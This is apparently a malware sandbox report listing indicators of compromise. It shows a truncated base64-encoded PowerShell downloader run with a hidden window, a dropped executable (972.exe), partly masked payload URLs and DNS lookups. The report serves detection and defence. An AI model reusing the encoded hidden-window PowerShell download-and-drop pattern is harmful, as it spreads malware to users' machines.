Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByAGUAaQB6AG4AZQBpAGcAYgBlAG8AYgBsAGEAaQBrAD0AJwB0AGgAbwB1AGMAcQB1AGkAZQB0AGMAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAYABVAFIASQBgAF...
- %HOMEPATH%\972.exe
- %HOMEPATH%\972.exe
- %HOMEPATH%\972.exe
- http://xy##sck.com/wp-admin/4ltp_6h_d6hcijri8/
- http://ch####mica.com.br/loja/qtbmmjrt14kd4ot_t9cfy83_g42n8ts6/
- http://gi###anroij.nl/170101/cua5mnzjfcg8bi8esjju_ryiud_qjv2zcgixs/
- DNS ASK fa####adhotnews.com
- DNS ASK xy##sck.com
- DNS ASK bo###erinn.com
- DNS ASK ch####mica.com.br
- DNS ASK gi###anroij.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByAGUAaQB6AG4AZQBpAGcAYgBlAG8AYgBsAGEAaQBrAD0AJwB0AGgAbwB1AGMAcQB1AGkAZQB0AGMAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAGMAYABVAFIASQBgAF...' (with hidden window)